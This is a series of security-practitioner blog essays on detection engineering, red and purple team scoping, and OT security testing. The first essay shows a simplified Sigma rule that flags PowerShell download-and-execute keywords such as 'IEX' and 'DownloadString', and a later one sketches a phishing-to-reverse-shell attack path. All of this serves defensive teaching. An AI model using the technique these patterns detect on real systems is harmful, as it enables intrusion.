Let's look at a real example. This is a common Sigma rule (simplified):


title: Suspicious PowerShell Execution
detection:
  selection:
    EventID: 4688
    CommandLine|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
  condition: selection

This rule fires when PowerShell runs with suspicious keywords. Seems solid. Catches code injection, right?

Now let's deploy it in a real environment:

  1. Your software deployment tool (SCCM, Ansible, whatever) runs PowerShell scripts with DownloadString. Alert every 30 seconds. Disable the rule.
  1. Your backup vendor runs scheduled PowerShell jobs that invoke expressions. Thousands of alerts per day. Tune it out.
  1. Your developers have scripts with "IEX" in comments. Execution fires on comment lines. Noise.
  1. Your EDR has whitelisting for Microsoft-signed PowerShell; your SIEM doesn't. It alerts on things EDR already allowed.

By week two, detection engineers have disabled half the rule. By month one, it's gone. And when an attacker actually uses PowerShell injection, it's not being monitored because the rule was too noisy to keep.

The rule didn't fail because it was poorly written. It failed because it was environment-agnostic.

Why Generic Rules Don't Survive Contact with Reality

Detection rules written in a vacuum assume:

  • No legitimate tools use the same technique
  • All environments have the same baseline behaviour
  • Detection can be tuned to pure signal (no noise)
  • Attackers use the same techniques in every environment

All false.

In a real environment:

1. Legitimate tooling is weird. Your backup software might use SMB in ways that look like lateral movement. Your monitoring agent might inject DLLs that look like persistence. Your deployment pipeline might run binaries with command-line obfuscation that looks like evasion.

2. Baselines vary wildly. A developer workstation runs PowerShell constantly. A kiosk never does. A bank branch server runs different software than your headquarters. A rule tuned for one environment is useless or too noisy in another.

3. Tuning for signal means losing sensitivity. You can build a rule that catches 100% of attacks. But it'll also alert on 10,000 false positives. The choice is: tune aggressively (miss attacks) or accept noise (burn out analysts). There's no free lunch.

4. Attackers adapt to your environment. An attacker who knows you monitor PowerShell won't use PowerShell. They'll use legitimate admin tools, scheduled tasks, or techniques that blend into your baseline.

The Real Problem With Sigma (and YARA, and Generic Rules)

Don't get me wrong—Sigma is excellent. Open-source, community-driven, better than nothing.

But Sigma is a language, not a solution. It's like saying "I have a hammer" and expecting to build a house. You need a builder.

When people drop Sigma rules from the internet into their SIEM without context, they get either:

  • Blindly tuned rules — so permissive they're useless
  • Overly aggressive rules — so noisy they're turned off within a week
  • Rules that don't apply — designed for environments completely different from yours

I've seen security teams import 1000 Sigma rules and then abandon 900 of them. That's not a detection programme; that's security theatre.

What Actually Works

Effective detection is built bottom-up, not top-down.

Start with your environment baseline.

Run your legitimate tools and systems for a week. Capture:

  • Normal PowerShell execution patterns (what commands, how often, from which systems)
  • Normal network connections (which systems talk to which, ports, protocols)
  • Normal process relationships (which processes spawn which children)
  • Normal file writes (where legitimate software writes, when, how often)

Write this down. This is your signal floor. Anything below this is noise; anything above is suspicious.

Then build detection for your actual threats.

Not MITRE ATT&CK. Not Sigma. Your threats. FIN7 would use living-off-the-land techniques in your environment. Ransomware would move laterally using your admin tools. Insiders would access your sensitive data paths.

Build rules for those specific paths, in your specific environment, against your specific baseline.

Example: You know that administrative access to your financial database should only come from 3 specific systems, at 2 PM on Mondays (batch job), from 2 specific service accounts.

Anything else? Alert immediately. No false positives because you know your baseline.

Tune for precision, not coverage.

Don't try to detect every possible attack technique. Detect the ones that matter to you. Quality over quantity.

Ten precise, high-fidelity rules that catch real attacks beat 1000 rules that trigger on everything.

The Role of Generic Rules

Sigma and community rules aren't useless. They're a starting point—a hypothesis library.

Use them like this:

  1. Review — Which techniques are relevant to my threat model?
  2. Understand — What is this rule trying to catch? How does it work?
  3. Evaluate — Would this actually detect an attack in my environment, or would it be lost in noise?
  4. Adapt — Rewrite it for my baseline. Add context (system type, user, time of day). Whitelist known legitimate use cases.
  5. Test — Run it against historical data. Does it catch what you expect? How many false positives?
  6. Deploy — Only if it's precise enough to keep tuned for more than a month.

This takes time. It's not as fast as importing 800 rules. But it works.

The Uncomfortable Truth

If your detection programme consists of:

  • Rules from the internet
  • Sigma rules you didn't adapt
  • Detection thresholds you didn't tune
  • Coverage of every MITRE ATT&CK technique

...then you have a detection programme in name only. In practice, you're hoping someone else's rules work in your environment. They usually don't.

The uncomfortable part: Detection engineering is environment-specific work. It can't be outsourced to community rules or vendor defaults. It requires someone who understands:

  • Your systems (what's normal)
  • Your threats (what's dangerous)
  • Your tools (what they can actually detect)

That person is on your team. Or you don't have effective detection.

What's Next

For your detection programme:

  1. Audit your rules. How many do you actually tune and maintain? Delete the rest.
  2. Establish your baseline. Document normal behaviour for critical systems and techniques.
  3. Build environment-specific rules for your threat model. Don't import; adapt.
  4. Focus on precision. Ten good rules beat 1000 mediocre rules.
  5. Invest in the people who know your environment. That's where effective detection lives.

Further Reading:

  • Detection Engineering and Threat Hunting (Marcus Hutchins): Real-world detection work
  • Security Data Science (Andrew Pendergast): Baselining and anomaly detection
  • Florian Roth's Sigma rules: Study how they work; understand why you'll need to adapt them

Question: How many detection rules do you maintain? How many are turned off? We should talk about that.


Next week: Building a detection baseline for your critical systems. Plus: A real case where generic rules missed an entire attack.

Previous
← Your Purple Team Test Failed Because Your Threat Model Is Wrong
← All essays
Purple Teaming

Why Your Red Team Tests Are Designed to Fail, And You Don't Know It

Hugh McGauran 3 April 2026 6 min read

Red team comes in on Monday. They've got a scope, a timeline, and a list of techniques to test. By Friday, they've "successfully executed" initial access, lateral movement, persistence, and exfiltration.

Blue team reviews the engagement. They have a list of "findings." Detection missed everything. Security posture looks weak.

So you hire another consultant. You buy more tooling. You run the test again next quarter.

Same results.

Here's what nobody tells you: Your red team isn't testing what you think they're testing.

The Scope Problem

Let me walk you through a real engagement.

Client is a mid-market insurance company. They scope the red team exercise: "Test our security posture against advanced threats. Use realistic techniques. Show us what an attacker could do."

Red team scope:

  • Initial access (phishing, watering hole, supply chain)
  • Lateral movement (everything on the network)
  • Persistence (any means necessary)
  • Exfiltration (any data, any method)

This sounds comprehensive. It sounds realistic. It's actually a fantasy.

Reality: An attacker targeting this client doesn't have "any means necessary" access to "everything on the network." They have:

  • Initial access: Maybe phishing works. Maybe it doesn't. They don't get to pivot to every possible next step.
  • Lateral movement: They can move within the compromised subnet and maybe one adjacent network. Hard segmentation blocks them beyond that.
  • Persistence: Certain accounts and systems work; others have additional logging and monitoring.
  • Exfiltration: They can exfil data, but they're constrained by network egress points and monitoring.

But the red team scope doesn't acknowledge these constraints. So red team tests in a sandbox where every attack succeeds because they're not fighting the real environment—they're fighting an idealized version of it.

The Environment Problem

Here's where it gets messy.

Red team asks: "What systems can we access?"

Blue team (or the client) says: "Whatever an attacker could realistically access."

This is ambiguous. So red team interprets it broadly: everything reachable on the network is fair game.

What they should have asked: "What systems can an attacker realistically access given our segmentation, credential controls, and monitoring?"

The answer is usually much smaller. A real attacker targeting insurance data doesn't have access to the file servers in marketing, the development lab, or the HVAC management system. But if nobody explicitly excludes those from scope, red team tests them anyway.

Then when red team successfully gets to the marketing server (which has no monitoring), blue team documents it as a detection failure. Really, it's a scope definition failure.

The Technique Problem

Red team gets creative. They use techniques that sound realistic but aren't actually part of any real attack chain for this environment:

  • Kerberos relay attacks (requires certain network conditions that don't exist here)
  • Memory-only persistence (requires no EDR; EDR is deployed)
  • Named pipe lateral movement (works in the test, but in production the pipes are monitored)
  • PowerShell obfuscation (detected by their logging; they just didn't run it in the test)

Red team succeeds because they're testing in isolation. They're testing: "Is this technique possible?" not "Is this technique undetectable in your environment?"

Blue team thinks detection failed. Really, detection is fine—the technique just wasn't realistic.

The Time Problem

Red team has unlimited time to find a path. An attacker has limited time before they're detected.

Real attack: Attacker lands, spends 30 minutes poking around, tries three things, gets blocked/detected on the third, leaves (or adapts).

Red team test: Attacker lands, tries thirty things over a week, finds one that works, uses it, succeeds.

The persistence and thoroughness of a week-long engagement is not representative of the speed/detection requirements of a real intrusion.

But nobody talks about this in the debrief. Red team just marks it as "successful lateral movement."

What This Means

Your red team engagement tells you:

"Over an extended period, using known techniques, with no time pressure, against systems and networks we can freely access and test, we were able to move laterally and exfiltrate data."

What it doesn't tell you:

"Against your actual threat model, in real time, with your actual monitoring and detection in place, this is what would happen."

Those are very different questions.

The Better Approach

Real-world red team engagements should be scoped to match reality:

  1. Threat-model driven scope. Don't test "everything." Test what your actual adversary would target and how they'd move.
  1. Time-limited and detection-aware. Red team doesn't have unlimited time to brute-force techniques. They have 48 hours to land, move, and exfil before they assume they're burned. Blue team knows they're in the environment and is actively hunting.
  1. Constrained to realistic access. Red team starts from actual initial access vector (phishing, supply chain, etc.) not from "we've already compromised a workstation." They work with the access they actually get.
  1. Detection evasion is the goal, not secondary. Red team doesn't just run commands; they try to run them in ways that avoid detection. If it's immediately flagged, it fails—doesn't matter if the technique "works."
  1. Realistic tool constraints. Red team uses tools an attacker would actually use, not just "what works in this test." If they'd use living-off-the-land, they do. If they'd avoid Mimikatz because EDR would catch it, they do.

The Uncomfortable Conversation

Here's what I'd tell a client:

"Your last red team engagement tested whether advanced techniques are possible in your environment, not whether they'd succeed in a real attack. The findings are less meaningful than you think. Let's reframe the next engagement around your actual threat model and realistic constraints."

This is hard because:

  • Red team has to work harder
  • Results are less "impressive" (maybe red team fails certain objectives)
  • It requires more collaboration between red and blue teams
  • It can't be outsourced to a generic red team vendor

But it's honest.

A Simple Test

Ask yourself:

  • Did red team use techniques because they were realistic for your threat model, or because they worked in the test?
  • Would your actual threat actor have access to every system red team tested?
  • Did red team have to evade detection, or was it just running commands and seeing what worked?
  • Were there time or detection constraints that matched a real attack, or was it an extended, unmolested testing window?

If the answer to any of these is "not really," your engagement was testing techniques, not threats.


Further Reading:

  • NIST SP 800-115 (Technical Security Testing): How to scope and run engagements properly
  • Adversary emulation vs. penetration testing: The difference matters
  • Detection-driven red teaming: A better framework

Reality check: When was your last red team engagement? What did it actually prove?


Next week: How to properly scope a red team exercise. Plus: A case study where realistic constraints changed the entire engagement outcome.

Previous
← Detection Engineering in a Real Environment: Why Generic Rules Fail
← All essays
Purple Teaming

Purple Teaming That Actually Works: A Framework for Real Collaboration

Hugh McGauran 10 April 2026 6 min read

You've got a red team and a blue team. They hate each other.

Red team thinks blue team is incompetent because they don't understand adversary tradecraft. Blue team thinks red team is reckless because they don't understand operational risk. They don't talk unless it's a quarterly "engagement."

Then someone tells you about "purple teaming" and you think: "Problem solved."

It's not. Purple teaming is a methodology that requires real work. Most programmes fail because they're treated as a project (quarterly test) instead of a practice (continuous collaboration).

Here's how to actually do it.

The Failure Mode

Most purple team attempts follow this pattern:

Month 1: Announce purple team programme. Red and blue teams meet. There's optimism.

Month 2–3: Red team runs a "collaborative exercise." Blue team watches. Debrief is awkward. Red team did things blue team thinks are wrong. Blue team didn't detect things they think they should have.

Month 4: Nothing changes. Red team goes back to thinking about attacks. Blue team goes back to reactive defense.

Month 5: "Why aren't we purple teaming anymore?" Meeting gets scheduled.

Month 6–12: Quarterly reports replace continuous collaboration. Programme becomes checkboxes.

Why does this happen? Because purple teaming requires fundamentally different thinking, and no one allocated time for that shift.

What Purple Teaming Actually Is

Purple teaming isn't red team + blue team in the same room. It's:

Continuous, aligned, threat-model-driven collaboration between attack and defense.

That's different from:

  • Red teaming (I attack; you detect what I did)
  • Blue teaming (I defend; hope you don't break my things)
  • Penetration testing (Contract engagement with findings)
  • Security auditing (Compliance check)

Purple teaming means:

  • Red team understands blue team's detection capabilities and constraints
  • Blue team understands attack sequences and threat actor patterns
  • Both teams align on what matters (threat model)
  • Both teams iterate continuously to improve both attack and defense
  • Collaboration is built into operations, not scheduled quarterly

The Framework

Here's how to actually build it:

1. Establish Shared Threat Model (Week 1)

Red and blue teams sit together. No red team slides, no blue team slides. Just reality.

Questions to answer together:

  • Who threatens us? (Be specific: APT groups, competitors, insiders, criminals)
  • What do they want? (Data, disruption, espionage, financial gain)
  • How do they typically access our environment? (Phishing, supply chain, stolen creds, physical access)
  • What paths exist from initial access to objective? (Not "any path"—realistic paths given our segmentation and security controls)
  • How much time do they have? (Minutes? Hours? Days?)
  • What detection would burn them? (At what point does our environment go "we're under attack"?)

Document this. Literally write it down. "We believe APT28 targets financial services via spear-phishing for initial access. They move laterally within 2-4 hours. They exfil via HTTPS to infrastructure we can't block."

This is not a consultant document. This is the shared foundation.

2. Map Realistic Attack Paths (Week 2–3)

Now, given that threat model, what are the actual attack paths?

Not "everything MITRE ATT&CK says is possible." The paths your threat model actually uses.

Draw them:


Initial Access (phishing email)
    ↓
User clicks, code executes (PowerShell, Word macro, whatever)
    ↓
Reverse shell / beaconing established
    ↓
Lateral movement to: [SQL server? File server? DC? Not everywhere—only where they'd go]
    ↓
Objective: [Exfil financial data? Plant backdoor? Disrupt systems?]

Blue team adds detection points:


Initial Access → EDR monitors suspicious process execution
    ↓ (if they evade)
Reverse shell → Firewall monitors outbound HTTPS to unknown IPs
    ↓ (if they evade)
Lateral movement → Network monitoring for admin tool usage on [specific systems]
    ↓ (if they evade)
Objective → Data loss prevention monitors file access patterns

Now you have an attack sequence + detection sequence. This is what you test. Not everything. This.

3. Red Team Operates Within Constraints (Ongoing)

Red team's job changes. They don't try to breach the environment. They try to follow the realistic threat path while evading detection.

Rules:

  • Start from your actual initial access vector (phishing, not "assume we're already in")
  • Move only to systems your threat model would target
  • Use tools/techniques your threat model would use
  • Avoid detection, don't just run commands

When red team succeeds: "We successfully executed the threat model while avoiding detection."

When red team fails: "We were detected at the lateral movement phase."

Both are valuable. Both tell blue team something real.

4. Blue Team Hunts Actively (Ongoing)

Blue team doesn't passively watch. They actively hunt for the attack.

Weekly threat hunting sessions:

  • "Given our threat model, what would the initial access look like?"
  • "What can we detect in the first 30 minutes?"
  • "Can we spot lateral movement before they reach the objective?"

Use Atomic Red Team playbooks, but scoped to your paths.

Update detection rules based on what red team teaches them about evasion.

5. Iterate (Monthly)

Once a month, red and blue teams sync:

  • What did red team learn about evasion?
  • What did blue team learn about detection?
  • Did our threat model change? (New threat intel, new attacks in the wild?)
  • How did we do against a realistic attack? Faster than last month? More detection?

Adjust next month's exercises based on findings.

The Governance

For this to work, you need:

Time allocation:

  • Red team: 20% of their week to collaborative exercises (not 100% red ops)
  • Blue team: 5–10% of SOC time to active hunting (not just passive monitoring)
  • Leadership: Time for monthly sync and iteration

Metrics (not vanity metrics):

  • Mean time to detect (for the threat model you care about)
  • Mean time to respond
  • Techniques red team is using that blue team isn't catching
  • Detection improvements month-over-month

Escalation path: If red team finds something critical (real vulnerability, not just "technique works"), what happens? (Shouldn't be stuck in a quarterly debrief.)

The Uncomfortable Part

This takes time. It's not shiny. It doesn't fit neatly on a security audit checklist.

You can't outsource it to a quarterly consultant. You need your own people, aligned on threat model, collaborating continuously.

If you don't have budget for this, purple teaming won't work. You'll run the motions and get the theatre. You won't get the results.

But if you do this right, you get something real:

  • Red team that understands why they're testing what they're testing
  • Blue team that detects threats faster
  • Security operations that improve month-over-month
  • Collaborative culture instead of siloed teams

Checklist: Do You Have a Real Purple Team Programme?

  • [ ] Shared, documented threat model (written, agreed by red + blue + leadership)
  • [ ] Realistic attack paths (not "test everything," but specific sequences)
  • [ ] Red team constrained to threat model (not unlimited scope)
  • [ ] Blue team actively hunting (not passively monitoring)
  • [ ] Monthly sync between teams (with iteration, not just reporting)
  • [ ] Detection improving month-over-month (measurable)
  • [ ] Budget allocated (not "squeeze in around other work")

If you don't check most of these, you have a red team and a blue team. You don't have purple teaming.


Further Reading:

  • Practical Purple Teaming (Alfie Champion): The operational playbook
  • VECTR: Framework for adversary emulation and red teaming
  • Active Defense: Threat modelling for defence

Question: Do you have a documented threat model that both red and blue teams agree on? Start there.


Next week: Building a threat model with your team. Plus: How to measure purple team ROI without vanity metrics.

Previous
← Why Your Red Team Tests Are Designed to Fail, And You Don't Know It
← All essays
Red TeamPurple TeamingThreat Modelling

How to Scope a Red Team Engagement That Tells You Something Real

Hugh McGauran 16 April 2026 6 min read

Most red team engagements produce an impressive document and a set of "critical findings" that the security team could have predicted before the first phishing email was sent.

The problem is usually not the red team. It's the scope conversation. Nobody has it properly.

Here is how to have it.

Start with the question you actually want answered

The scoping conversation that produces useless engagements sounds like this:

"Test our security posture against advanced threats. Be creative."

The scoping conversation that produces useful engagements sounds like this:

"Given that our primary threat is financially motivated actors targeting customer payment data, can they reach the payment processing systems from a compromised workstation in our Manchester office, and would we detect them before they got there?"

The second version has a specific adversary, a specific entry point, a specific objective, and a detection question embedded in it. The first version has none of those things, so red team invents all of them — usually in their own favour.

Your first job in scoping is to write down the question you want answered. One paragraph. If you cannot write it down, you are not ready to scope.

Build scope from threat model, not from technique list

Most scoping starts with techniques: "We want to test phishing, lateral movement, persistence, and exfil." That is backwards.

Start with the threat model:

  • Who is likely to target us? Be specific. Financially motivated criminals? Competitors? Nation-state? Insider?
  • What do they want? What data or systems are the actual target?
  • How do they typically get in? Phishing? Supply chain? Exposed credentials?
  • What does realistic movement look like? Not "everything on the network" — what would they actually try to reach and how?
  • What constraints do they operate under? Time pressure? Detection avoidance? Noise tolerance?

Once you have answered those questions, the technique list writes itself. And more importantly, techniques that do not fit your actual threat model get dropped.

Write explicit success and failure criteria

This is the single most neglected part of red team scoping. Most engagements have no stated criteria for what success looks like.

Without success criteria, red team will always succeed — because they define success as "we got somewhere interesting."

Write it down before the engagement:

Success for red team: They reach the target system, exfiltrate a defined data set, and do so without detection.

Success for blue team: They detect the activity within a defined time window, from a defined detection point, and contain it before objective is reached.

Partial success: What does it mean if red team reaches the target but is detected? What if they are not detected but never reach the target because segmentation blocked them?

These definitions have to be agreed by both teams and by leadership before the engagement starts. They cannot be redefined after the fact.

Define the starting position precisely

"Assume initial access" is not a starting position. It is an excuse to skip the hardest part.

For a useful engagement, the starting position should be:

  • Where exactly is red team? A phishing-compromised user workstation in a specific office? A contractor account? A supply chain compromise?
  • What access does that starting position realistically give them? What systems can they reach? What credentials do they have? What can they see?
  • What controls are in place at that starting position? EDR, network monitoring, conditional access?

If you say "assume workstation compromise in the marketing department," that means red team starts with the access a phished marketing employee actually has — not admin on the domain controller.

Scope systems explicitly, not by implication

The most common scoping failure: undefined boundaries.

If you do not explicitly say a system is in scope, red team will assume it is. That leads to findings on systems that have nothing to do with your threat model, which wastes everyone's time.

Write it out:

In scope:

  • Workstations in the Manchester office
  • The shared file server at [address]
  • The payment processing staging environment
  • Credentials available from a phished marketing employee

Out of scope:

  • Production payment systems (test in staging only)
  • SCADA and operational technology systems
  • HR systems (different threat model, separate engagement)
  • Any system requiring physical access

If you do not write the out-of-scope list, red team will find their way into systems that generate impressive-sounding findings but tell you nothing about the threat you actually face.

Agree time constraints upfront

Real attacks are not multi-week affairs where the attacker has unlimited attempts. They are time-pressured.

Define it:

  • Red team has 48 hours from initial access to reach the objective
  • If not reached in 48 hours, the engagement concludes that phase
  • Blue team knows an exercise is running and is actively hunting from hour zero

This changes the exercise significantly. Red team cannot brute-force their way through every possible technique. They have to prioritise, which is what a real attacker does.

The detection question is as important as the access question

Most scoping focuses entirely on whether red team can reach the objective. That is only half the question.

The equally important question: at what point does blue team know red team is in the environment?

Design the scope to answer both:

  • Can an attacker reach the target? (access question)
  • When and how would we know they were there? (detection question)

If you only answer the first question, you learn you have a gap but not how to close it. If you answer both, you have something to act on.

Practical scope document structure

A usable scope document has six sections:

  1. The question — one paragraph, what you are trying to learn
  2. Threat model — who, what they want, how they operate
  3. Starting position — precise definition of initial access and access level
  4. In scope systems — explicit list, no ambiguity
  5. Out of scope systems — explicit list, with brief rationale
  6. Success and failure criteria — defined for red team, blue team, and partial outcomes

That document gets signed off by red team lead, blue team lead, and the engagement sponsor before anyone runs a single command.

The uncomfortable outcome of good scoping

When you scope properly, two things happen that most organisations find uncomfortable.

First, red team may fail. They may not reach the objective within time constraints, because your controls work for the threat model you care about. That is a good outcome. It should be celebrated, not treated as a sign the exercise was not worthwhile.

Second, the findings are narrower. You will not get a 40-page report with 200 findings. You will get a precise answer to the precise question you asked. That is more valuable, but it looks less impressive in a board deck.

If your organisation rewards impressive-looking reports over honest answers, that is a culture problem. Fix the culture, not the scope.


Next week: Building a detection baseline — the work nobody wants to do, and why it is the foundation of everything else.

Previous
← Purple Teaming That Actually Works: A Framework for Real Collaboration
← All essays
OT SecurityPurple TeamingICSCritical Infrastructure

Purple Teaming OT: Why 'We Can't Test That' Is No Longer Acceptable

Hugh McGauran 23 April 2026 6 min read

I keep hearing the same thing in conversations about operational technology security.

"We can't purple team OT. The risk is too high. You can't test live systems."

That view made sense in 2015. It does not make sense now. The threat actors attacking energy, utilities, and critical infrastructure are not holding back out of concern for operational continuity — and your detection capability has no idea whether it works until you test it.

The question is not whether to test OT environments. The question is how to do it without causing the incident you are trying to prevent.

The real problem is not the systems — it is the approach

When people say OT cannot be tested, they usually mean one of two things: they tried to apply IT purple team methodology directly to OT and something broke, or they have never done it and they are extrapolating from the horror stories of people who did it wrong.

OT environments are unforgiving. A misconfigured command to a PLC does not generate a BSOD — it can trigger a physical consequence. Latency-sensitive protocols like Modbus and DNP3 respond badly to unexpected traffic. Safety instrumented systems exist for a reason.

None of that means you cannot test. It means you need to be more disciplined about how you do it.

Three principles that change the equation

1. Craft TTPs with clear operational objectives before you touch anything

Every TTP you plan to emulate must be tied to a specific detection question. Not "can we simulate Industroyer?" but "if an adversary used Industroyer's lateral movement pattern from the engineering workstation to the HMI, would our SIEM alert on it, and within what timeframe?"

The TTP is a vehicle. The detection question is the destination. If you cannot articulate the detection question, you are not ready to run the test.

This forces the red team to think like a threat, and forces the blue team to pre-commit on what good detection looks like — before they know the outcome.

2. Test on virtual environments first, without exception

A high-fidelity OT testbed is not optional — it is the prerequisite for running any test in a live environment. Most asset owners in energy and utilities either have one or can access one through their ICS vendor or an MSSP with OT capability.

You run the full TTP in the virtual environment. You validate that it behaves as expected. You confirm that the detection logic fires (or confirm that it does not, which is itself a finding). You document the exact execution sequence, timing, and expected artefacts.

Only then do you consider a controlled execution in the live environment — and only for those elements where live-environment fidelity actually matters to the detection question.

3. D-Day tests are controlled, time-boxed, and pre-notified to operations

If you run a test in a live OT environment without the operations team knowing the time window, you have created unnecessary risk and guaranteed a bad outcome if anything goes wrong.

The D-Day test is not a surprise for operations — it is a surprise for the SOC. The operations team knows: time window, what systems are in scope, what the abort condition is, and who the single point of contact is if they need to halt. The SOC does not know it is happening.

This structure lets you get genuine detection fidelity without creating an incident.

What you will find

The findings from OT purple team exercises are remarkably consistent. I have seen variants of the same list across energy clients, utilities, and manufacturing environments:

  • Logs not piped to the SIEM. OT assets generating security-relevant events — historians, HMIs, engineering workstations — are either not logging or logging to a destination that nobody monitors. The SOC has no visibility into what is probably your most targeted environment.
  • Inconsistent asset classification. The asset inventory treats a Windows-based HMI the same as a corporate laptop. Different patch cadence, different network controls, different authentication standards — but the risk classification does not reflect it. Detection rules built for IT assets do not translate.
  • Detection tools not calibrated for OT protocols. If your SIEM ingests OT network traffic, the alert rules were almost certainly written for IT traffic patterns. Modbus function code anomalies, unexpected DNP3 unsolicited responses, and OPC-UA enumeration all look different from SQL injection and lateral movement in Active Directory.
  • No playbooks for OT incidents. The SOC knows what to do when a Windows endpoint is compromised. They have no playbook for a compromised engineering workstation with a live connection to a control system. The decision escalation path does not exist.

None of these findings require you to break anything to discover them. They require you to ask the right questions, map the visibility gaps, and test whether your detection logic can see what it needs to see.

The asymmetry argument

Here is the strategic case if you still need one.

Adversaries targeting OT environments — state actors, ransomware groups operating in critical infrastructure, hacktivists — are already doing the reconnaissance. Volt Typhoon spent years in US critical infrastructure. Sandworm has hit power grids twice with demonstrable effect. ALPHV hit pipeline infrastructure without triggering a single pre-incident detection.

Your detection coverage in OT is either tested and validated, or it is assumed. Assumption is not a defence posture.

The risk of a controlled, well-scoped purple team exercise is small. The risk of finding out your detection capability is non-existent during an actual incident is significant.

Where to start

If you have not done OT purple teaming before, start narrow:

  1. Pick one site, one asset class, one threat scenario. Not the whole estate.
  2. Get a high-fidelity testbed. If you do not have one, find a vendor or partner who does.
  3. Define three detection questions before you write a single TTP.
  4. Run the testbed exercise end to end. Document every gap.
  5. Fix what you can fix before you touch the live environment.
  6. Only then plan a live D-Day test, and only for the detection questions where live fidelity is essential.

The first exercise will produce more findings than you can action in a quarter. That is fine. You will have replaced assumption with evidence — and evidence is how you prioritise.


Hugh McGauran is Country Manager for Ireland at Armis and has 25 years of experience in cybersecurity. PurpleTeamAI explores practical purple team methodology for practitioners who need results, not frameworks.

Previous
← How to Scope a Red Team Engagement That Tells You Something Real
← All essays
OT SecurityPurple TeamingICSPen Testing

The 7 Most Pointless Findings in OT Pen Tests

Hugh McGauran 30 April 2026 8 min read

If you run enough OT pen tests, you start to notice a pattern. The report arrives, the client is confused, and the findings have a peculiar quality: technically correct, operationally impossible to remediate, and almost entirely beside the point.

The pattern is always the same. An IT security finding gets run through an OT environment without adjusting for the context in which those systems operate. A report full of CVEs follows. The client cannot action half of it. The red team writes the same boilerplate recommendations they would write for a corporate network. The OT engineers roll their eyes and nothing changes.

Here are the seven findings I see most often that tell you more about the assessor's understanding of IT security than they do about the actual risk in the environment.

1. Plaintext Protocol

The finding: Modbus/TCP is unencrypted. This is a critical finding.

Why it is the wrong question: Modbus will never be encrypted. It is a protocol designed in 1979 for serial communication between PLCs and HMIs inside a single control loop. There is no version of replacing it that does not require replacing every device in the loop simultaneously, because the protocol is the interface. You cannot upgrade one end of a Modbus conversation without breaking the other.

What actually matters: The attack surface here is not confidentiality — it is proximity. If an adversary is on the same network segment as your Modbus traffic, you have larger problems than encryption. The question is network segmentation: what else is on the segment, and what lateral movement is possible from that position? Focus on whether the Modbus network is appropriately isolated from corporate IT, not whether the protocol uses TLS.


2. SNMP Default Community String

The finding: The SNMP community string is set to the vendor default.

Why it is the wrong question: On managed switches inside a properly segmented OT network, the risk from SNMP community strings is minimal. These devices are not exposed to the internet, not reachable from corporate IT without crossing a firewall, and the attack path requires an already-compromised position on the OT network. Changing the community string on a managed switch does not prevent an adversary who has already reached that network segment from doing damage.

What actually matters: The question is not whether the community string is default — it is whether the OT network is segmented from IT at the firewall level, and whether there are compensating controls that would detect or prevent an adversary from establishing the initial position required to exploit SNMP. If you have no IT/OT boundary control, that is the finding.


3. Unsupported Operating System

The finding: Windows XP Embedded HMI. Vendor is defunct. Operating system is end of life. Critical risk.

Why it is the wrong question: Yes, Windows XP Embedded is end of life. Yes, there are published CVEs. The finding is accurate. The remediation is also not replacing a running HMI that a plant operator spent ten years commissioning and tuning, because the vendor no longer exists and the replacement would require re-commissioning the entire control loop.

What actually matters: What is the actual exploitability in this environment? Is the HMI reachable from corporate IT? Is it reachable from the internet? Can it initiate outbound connections? An HMI that is fully air-gapped from everything except the PLC it talks to is a very different risk to one that sits on an IT network with a path to the internet. Tell the client what compensating controls reduce the actual risk — network segmentation, application whitelisting, monitoring — not what they already know they cannot do.


4. No Timed Account Lock

The finding: Workstations do not enforce account lockout after failed login attempts. This is a security misconfiguration.

Why it is the wrong question: These are control room workstations. During an emergency — a plant trip, a safety event, a night-shift operator responding to an alarm — the last thing you want is a workstation locking out the operator who is trying to bring a system back to a safe state. Account lockout is a deliberate decision by the plant's safety and operations team, not an oversight.

What actually matters: What is the physical access control on these workstations? Are they shared accounts? Is there monitoring on the account usage? Is the network-level access to these workstations controlled? The security concern behind account lockout policies — preventing brute force — can be addressed through network-level controls, proximity to the asset, and monitoring. Do not recommend the removal of a safety control without addressing the underlying concern it was designed to handle.


5. Deploy EDR

The finding: EDR is not deployed on PLCs and field devices.

Why it is the wrong question: PLCs run proprietary firmware. You cannot install software on them. There is no operating system that EDR supports. This finding demonstrates that the assessor ran a vulnerability scanner against the asset list without understanding what a PLC is or how it operates. The client will notice this. It undermines the credibility of everything else in the report.

What actually matters: EDR on engineering workstations and HMIs is a legitimate finding if it is missing — those are Windows or Linux systems that can run EDR agents. The more relevant question is whether the engineering workstation, if compromised, can reach the PLC and what the adversary can do from that position. That is the actual attack path. EDR on the PLC is not the control; network segmentation and monitoring of the engineering workstation are.


6. Disable Unnecessary Services

The finding: Unnecessary services are running on RTUs. These should be disabled.

Why it is the wrong question: RTU firmware is locked by the manufacturer. You cannot disable services on it any more than you can disable services on the firmware of a power supply. The RTU ships with a firmware image. That image is certified against the version of the protocol it implements. Flashing a modified firmware image would void the certification, potentially breach the vendor's support agreement, and in many jurisdictions for critical infrastructure would require re-certification of the entire system.

What actually matters: What is the actual threat model for these RTUs? Are they reachable from a compromised engineering workstation? Can they be reached directly across the network? The attack surface on a locked RTU is almost entirely in the hands of whatever can communicate with it — which is usually the control system network, not the RTU itself. Tell the client to focus on who can talk to the RTU and what commands are accepted, not on the services running inside the firmware.


7. SSH v1 Is Enabled

The finding: SSH version 1 is enabled on field devices.

Why it is the wrong question: In an ideal world, SSH v1 would not be enabled. SSH v2 has been standard for twenty years. The finding is accurate. The remediation — replacing the firmware on 400 field devices to remove SSH v1 — would cost more than most of these organisations' entire annual security budget, and there is no vendor-provided mechanism to do it on many of these devices.

What actually matters: Is SSH the actual attack vector here? An adversary who can reach port 22 on 400 field devices has likely already achieved a position that is more useful to them than exploiting SSH v1. The finding is a proxy. The real finding is: how did an adversary get to the point where they can reach port 22 on 400 field devices? Fix that problem first. The SSH v1 finding is a symptom, not the disease.


The Real Problem: Reports Written for Nessus, Not for OT

The common thread across all seven findings is the same. The assessor applied an IT security framework to an OT environment without adjusting for operational context. The findings are accurate in the abstract. They are useless in practice because the remediation path is either operationally impossible, financially disproportionate, or would introduce greater risk than the original finding.

Good OT pen test reports focus on what an adversary can actually do to the physical process — not on what a vulnerability scanner flags as critical. Flame risers, emergency shutdowns, valve positions, tank levels, process integrity — these are the consequences that matter in an OT environment. A finding that says "an adversary who compromises the engineering workstation can modify setpoints on the HMI and cause a process upset" is worth ten CVE criticals. A finding that says "CVE-2024-XXXX on Windows XP Embedded HMI" tells the client nothing they did not already know and nothing they can act on.

The environments are different. The risks are different. The fixes are not the same.

Write the report your OT client can actually use.


